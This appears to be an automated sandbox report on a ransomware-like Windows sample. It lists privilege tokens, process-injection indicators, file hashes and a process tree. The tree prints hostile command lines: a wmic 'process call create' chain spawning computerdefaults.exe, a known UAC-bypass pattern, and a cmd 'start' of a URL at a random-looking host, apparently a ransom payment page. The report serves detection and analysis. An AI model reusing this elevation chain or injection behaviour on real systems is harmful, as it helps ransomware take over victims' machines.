Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	1068	WMIC.exe
Token: SeSecurityPrivilege	1068	WMIC.exe
Token: SeTakeOwnershipPrivilege	1068	WMIC.exe
Token: SeLoadDriverPrivilege	1068	WMIC.exe
Token: SeSystemProfilePrivilege	1068	WMIC.exe
Token: SeSystemtimePrivilege	1068	WMIC.exe
Token: SeProfSingleProcessPrivilege	1068	WMIC.exe
Token: SeIncBasePriorityPrivilege	1068	WMIC.exe
Token: SeCreatePagefilePrivilege	1068	WMIC.exe
Token: SeBackupPrivilege	1068	WMIC.exe
Token: SeRestorePrivilege	1068	WMIC.exe
Token: SeShutdownPrivilege	1068	WMIC.exe
Token: SeDebugPrivilege	1068	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1068	WMIC.exe
Token: SeRemoteShutdownPrivilege	1068	WMIC.exe
Token: SeUndockPrivilege	1068	WMIC.exe
Token: SeManageVolumePrivilege	1068	WMIC.exe
Token: 33	1068	WMIC.exe
Token: 34	1068	WMIC.exe
Token: 35	1068	WMIC.exe
Token: 36	1068	WMIC.exe
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	944	WMIC.exe
Token: SeSecurityPrivilege	944	WMIC.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

Explorer.EXEMicrosoftEdge.exeMicrosoftEdgeCP.exe

pid process

3008 Explorer.EXE
1628 MicrosoftEdge.exe
2364 MicrosoftEdgeCP.exe
2364 MicrosoftEdgeCP.exe
Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3008 Explorer.EXE

pid	process
3008	Explorer.EXE
1628	MicrosoftEdge.exe
2364	MicrosoftEdgeCP.exe
2364	MicrosoftEdgeCP.exe

pid	process
3008	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

sihost.exesvchost.execmd.exeExplorer.EXEcmd.exetaskhostw.execmd.exeRuntimeBroker.execmd.execmd.exe1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2320 wrote to memory of 1272	2320	sihost.exe	notepad.exe
PID 2320 wrote to memory of 1272	2320	sihost.exe	notepad.exe
PID 2320 wrote to memory of 3516	2320	sihost.exe	cmd.exe
PID 2320 wrote to memory of 3516	2320	sihost.exe	cmd.exe
PID 2320 wrote to memory of 4024	2320	sihost.exe	cmd.exe
PID 2320 wrote to memory of 4024	2320	sihost.exe	cmd.exe
PID 2320 wrote to memory of 3840	2320	sihost.exe	cmd.exe
PID 2320 wrote to memory of 3840	2320	sihost.exe	cmd.exe
PID 2332 wrote to memory of 2828	2332	svchost.exe	cmd.exe
PID 2332 wrote to memory of 2828	2332	svchost.exe	cmd.exe
PID 2332 wrote to memory of 1400	2332	svchost.exe	cmd.exe
PID 2332 wrote to memory of 1400	2332	svchost.exe	cmd.exe
PID 3840 wrote to memory of 1068	3840	cmd.exe	WMIC.exe
PID 3840 wrote to memory of 1068	3840	cmd.exe	WMIC.exe
PID 3008 wrote to memory of 1168	3008	Explorer.EXE	cmd.exe
PID 3008 wrote to memory of 1168	3008	Explorer.EXE	cmd.exe
PID 3008 wrote to memory of 4016	3008	Explorer.EXE	cmd.exe
PID 3008 wrote to memory of 4016	3008	Explorer.EXE	cmd.exe
PID 4024 wrote to memory of 944	4024	cmd.exe	WMIC.exe
PID 4024 wrote to memory of 944	4024	cmd.exe	WMIC.exe
PID 2732 wrote to memory of 1816	2732	taskhostw.exe	cmd.exe
PID 2732 wrote to memory of 1816	2732	taskhostw.exe	cmd.exe
PID 2732 wrote to memory of 2740	2732	taskhostw.exe	cmd.exe
PID 2732 wrote to memory of 2740	2732	taskhostw.exe	cmd.exe
PID 2828 wrote to memory of 3040	2828	cmd.exe	WMIC.exe
PID 2828 wrote to memory of 3040	2828	cmd.exe	WMIC.exe
PID 3456 wrote to memory of 3876	3456	RuntimeBroker.exe	cmd.exe
PID 3456 wrote to memory of 3876	3456	RuntimeBroker.exe	cmd.exe
PID 3456 wrote to memory of 3224	3456	RuntimeBroker.exe	cmd.exe
PID 3456 wrote to memory of 3224	3456	RuntimeBroker.exe	cmd.exe
PID 1400 wrote to memory of 2140	1400	cmd.exe	WMIC.exe
PID 1400 wrote to memory of 2140	1400	cmd.exe	WMIC.exe
PID 4016 wrote to memory of 1804	4016	cmd.exe	WMIC.exe
PID 4016 wrote to memory of 1804	4016	cmd.exe	WMIC.exe
PID 1556 wrote to memory of 3024	1556	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	cmd.exe
PID 1556 wrote to memory of 3024	1556	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	cmd.exe
PID 1556 wrote to memory of 1900	1556	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	cmd.exe
PID 1556 wrote to memory of 1900	1556	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	cmd.exe
PID 1168 wrote to memory of 3148	1168	cmd.exe	WMIC.exe
PID 1168 wrote to memory of 3148	1168	cmd.exe	WMIC.exe
PID 2740 wrote to memory of 3684	2740	cmd.exe	WMIC.exe
PID 2740 wrote to memory of 3684	2740	cmd.exe	WMIC.exe
PID 1556 wrote to memory of 3796	1556	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	cmd.exe
PID 1556 wrote to memory of 3796	1556	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	cmd.exe
PID 1816 wrote to memory of 3924	1816	cmd.exe	WMIC.exe
PID 1816 wrote to memory of 3924	1816	cmd.exe	WMIC.exe
PID 1556 wrote to memory of 984	1556	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	cmd.exe
PID 1556 wrote to memory of 984	1556	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	cmd.exe
PID 3876 wrote to memory of 2564	3876	cmd.exe	WMIC.exe
PID 3876 wrote to memory of 2564	3876	cmd.exe	WMIC.exe
PID 3224 wrote to memory of 1368	3224	cmd.exe	WMIC.exe
PID 3224 wrote to memory of 1368	3224	cmd.exe	WMIC.exe
PID 3024 wrote to memory of 1916	3024	cmd.exe	WMIC.exe
PID 3024 wrote to memory of 1916	3024	cmd.exe	WMIC.exe
PID 1900 wrote to memory of 2436	1900	cmd.exe	WMIC.exe
PID 1900 wrote to memory of 2436	1900	cmd.exe	WMIC.exe
PID 3796 wrote to memory of 1324	3796	cmd.exe	WMIC.exe
PID 3796 wrote to memory of 1324	3796	cmd.exe	WMIC.exe
PID 984 wrote to memory of 4144	984	cmd.exe	WMIC.exe
PID 984 wrote to memory of 4144	984	cmd.exe	WMIC.exe
PID 4228 wrote to memory of 4452	4228	cmd.exe	ComputerDefaults.exe
PID 4228 wrote to memory of 4452	4228	cmd.exe	ComputerDefaults.exe
PID 4220 wrote to memory of 4472	4220	cmd.exe	ComputerDefaults.exe
PID 4220 wrote to memory of 4472	4220	cmd.exe	ComputerDefaults.exe

c:\windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2320

\??\c:\windows\system32\notepad.exe
notepad.exe C:\Users\Public\readme.txt
2⤵
- Opens file in notepad (likely ransom note)
PID:1272

\??\c:\windows\system32\cmd.exe
cmd /c "start http://ce7c208812783e608eltalkfzj.jobsbig.cam/eltalkfzj^&1^&43051757^&80^&333^&2215063"
2⤵
- Checks computer location settings
PID:3516

\??\c:\windows\system32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
2⤵
- Suspicious use of WriteProcessMemory
PID:4024

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:944

\??\c:\windows\system32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
2⤵
- Suspicious use of WriteProcessMemory
PID:3840

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1068

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2732

\??\c:\windows\system32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
2⤵
- Suspicious use of WriteProcessMemory
PID:1816

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
3⤵
PID:3924

\??\c:\windows\system32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
2⤵
- Suspicious use of WriteProcessMemory
PID:2740

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
3⤵
PID:3684

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3644

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3644 -s 812
2⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1488

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3456

C:\Windows\System32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
2⤵
- Suspicious use of WriteProcessMemory
PID:3876

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
3⤵
PID:2564

C:\Windows\System32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
2⤵
- Suspicious use of WriteProcessMemory
PID:3224

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
3⤵
PID:1368

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3008

C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
"C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe"
2⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1556

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
3⤵
- Suspicious use of WriteProcessMemory
PID:3024

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
4⤵
PID:1916

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
3⤵
- Suspicious use of WriteProcessMemory
PID:1900

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
4⤵
PID:2436

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
3⤵
- Suspicious use of WriteProcessMemory
PID:3796

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
4⤵
PID:1324

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
3⤵
- Suspicious use of WriteProcessMemory
PID:984

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
4⤵
PID:4144

C:\Windows\system32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
2⤵
- Suspicious use of WriteProcessMemory
PID:1168

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
3⤵
PID:3148

C:\Windows\system32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
2⤵
- Suspicious use of WriteProcessMemory
PID:4016

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
3⤵
PID:1804

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2332

\??\c:\windows\system32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
2⤵
- Suspicious use of WriteProcessMemory
PID:2828

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
3⤵
PID:3040

\??\c:\windows\system32\cmd.exe
cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
2⤵
- Suspicious use of WriteProcessMemory
PID:1400

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
3⤵
PID:2140

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4228

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:4452

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4220

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:4472

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4296

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:4608

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4324

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:4620

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4368

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:4528

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4460

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:4900

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4520

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:4756

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4672

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:5072

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4708

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:4396

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4732

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:4480

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4804

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:3788

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4816

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:420

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5008

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:376

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5036

C:\Windows\system32\ComputerDefaults.exe
computerdefaults.exe
2⤵
PID:2064

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1628

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:800

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2364

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:3168

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4996

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5116

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\Windows\3720402701\2274612954.pri
MD5
0db264b38ac3c5f6c140ba120a7fe72f

SHA1
51aa2330c597e84ed3b0d64bf6b73bf6b15f9d74

SHA256
2f6955b0f5277a7904c59e461bfa6b06c54fece0d7c11f27408fa7a281a4556d

SHA512
3534c243516cef5cee0540d5efd5cde1f378e127e6013b5e309a2e0be8393417bfe458706564b4b955f92132a51e2772c67f9fd90441476cc3512a5d9f910d84

Download Submit
C:\Users\Public\readme.txt
MD5
1fd6bb31cd6a18d53ddd72d1c26a8912

SHA1
b419c7cbc78eeb4ce80b5c7c12438ab2f70c572b

SHA256
f756af6e362ef4f39efaa2ff005631c4d8b88b0ab38daabc978bac37d33416dd

SHA512
17322a3cf202485f281d2e8738ad93ffd219483e9fb7a8f923e5d4786b00dbd1ab8579fa6d7356d0e89d2a08b4ab8ca15da5aebaa144ded2b8d6b533aafbdcef

Download Submit
memory/376-172-0x0000000000000000-mapping.dmp

Download
memory/420-171-0x0000000000000000-mapping.dmp

Download
memory/944-138-0x0000000000000000-mapping.dmp

Download
memory/984-152-0x0000000000000000-mapping.dmp

Download
memory/1068-135-0x0000000000000000-mapping.dmp

Download
memory/1168-136-0x0000000000000000-mapping.dmp

Download
memory/1272-128-0x0000000000000000-mapping.dmp

Download
memory/1324-158-0x0000000000000000-mapping.dmp

Download
memory/1368-154-0x0000000000000000-mapping.dmp

Download
memory/1400-134-0x0000000000000000-mapping.dmp

Download
memory/1556-126-0x00000216F7330000-0x00000216F7331000-memory.dmp

Filesize
4KB

Download
memory/1556-121-0x00000216F72C0000-0x00000216F72C1000-memory.dmp

Filesize
4KB

Download
memory/1556-125-0x00000216F7320000-0x00000216F7321000-memory.dmp

Filesize
4KB

Download
memory/1556-115-0x00000216F5250000-0x00000216F5256000-memory.dmp

Filesize
24KB

Download
memory/1556-157-0x00000216F7960000-0x00000216F7961000-memory.dmp

Filesize
4KB

Download
memory/1556-116-0x00000216F52D0000-0x00000216F52D1000-memory.dmp

Filesize
4KB

Download
memory/1556-123-0x00000216F7300000-0x00000216F7301000-memory.dmp

Filesize
4KB

Download
memory/1556-118-0x00000216F52F0000-0x00000216F52F1000-memory.dmp

Filesize
4KB

Download
memory/1556-124-0x00000216F7310000-0x00000216F7311000-memory.dmp

Filesize
4KB

Download
memory/1556-122-0x00000216F72D0000-0x00000216F72D1000-memory.dmp

Filesize
4KB

Download
memory/1556-119-0x00000216F5300000-0x00000216F5301000-memory.dmp

Filesize
4KB

Download
memory/1556-117-0x00000216F52E0000-0x00000216F52E1000-memory.dmp

Filesize
4KB

Download
memory/1556-120-0x00000216F72B0000-0x00000216F72B1000-memory.dmp

Filesize
4KB

Download
memory/1804-145-0x0000000000000000-mapping.dmp

Download
memory/1816-139-0x0000000000000000-mapping.dmp

Download
memory/1900-147-0x0000000000000000-mapping.dmp

Download
memory/1916-155-0x0000000000000000-mapping.dmp

Download
memory/2064-173-0x0000000000000000-mapping.dmp

Download
memory/2140-144-0x0000000000000000-mapping.dmp

Download
memory/2320-127-0x000001CD2AE90000-0x000001CD2AE94000-memory.dmp

Filesize
16KB

Download
memory/2436-156-0x0000000000000000-mapping.dmp

Download
memory/2564-153-0x0000000000000000-mapping.dmp

Download
memory/2740-140-0x0000000000000000-mapping.dmp

Download
memory/2828-133-0x0000000000000000-mapping.dmp

Download
memory/3024-146-0x0000000000000000-mapping.dmp

Download
memory/3040-141-0x0000000000000000-mapping.dmp

Download
memory/3148-148-0x0000000000000000-mapping.dmp

Download
memory/3224-143-0x0000000000000000-mapping.dmp

Download
memory/3516-130-0x0000000000000000-mapping.dmp

Download
memory/3684-149-0x0000000000000000-mapping.dmp

Download
memory/3788-168-0x0000000000000000-mapping.dmp

Download
memory/3796-150-0x0000000000000000-mapping.dmp

Download
memory/3840-132-0x0000000000000000-mapping.dmp

Download
memory/3876-142-0x0000000000000000-mapping.dmp

Download
memory/3924-151-0x0000000000000000-mapping.dmp

Download
memory/4016-137-0x0000000000000000-mapping.dmp

Download
memory/4024-131-0x0000000000000000-mapping.dmp

Download
memory/4144-159-0x0000000000000000-mapping.dmp

Download
memory/4396-169-0x0000000000000000-mapping.dmp

Download
memory/4452-160-0x0000000000000000-mapping.dmp

Download
memory/4472-161-0x0000000000000000-mapping.dmp

Download
memory/4480-170-0x0000000000000000-mapping.dmp

Download
memory/4528-162-0x0000000000000000-mapping.dmp

Download
memory/4608-163-0x0000000000000000-mapping.dmp

Download
memory/4620-164-0x0000000000000000-mapping.dmp

Download
memory/4756-165-0x0000000000000000-mapping.dmp

Download
memory/4900-166-0x0000000000000000-mapping.dmp

Download
memory/5072-167-0x0000000000000000-mapping.dmp

Download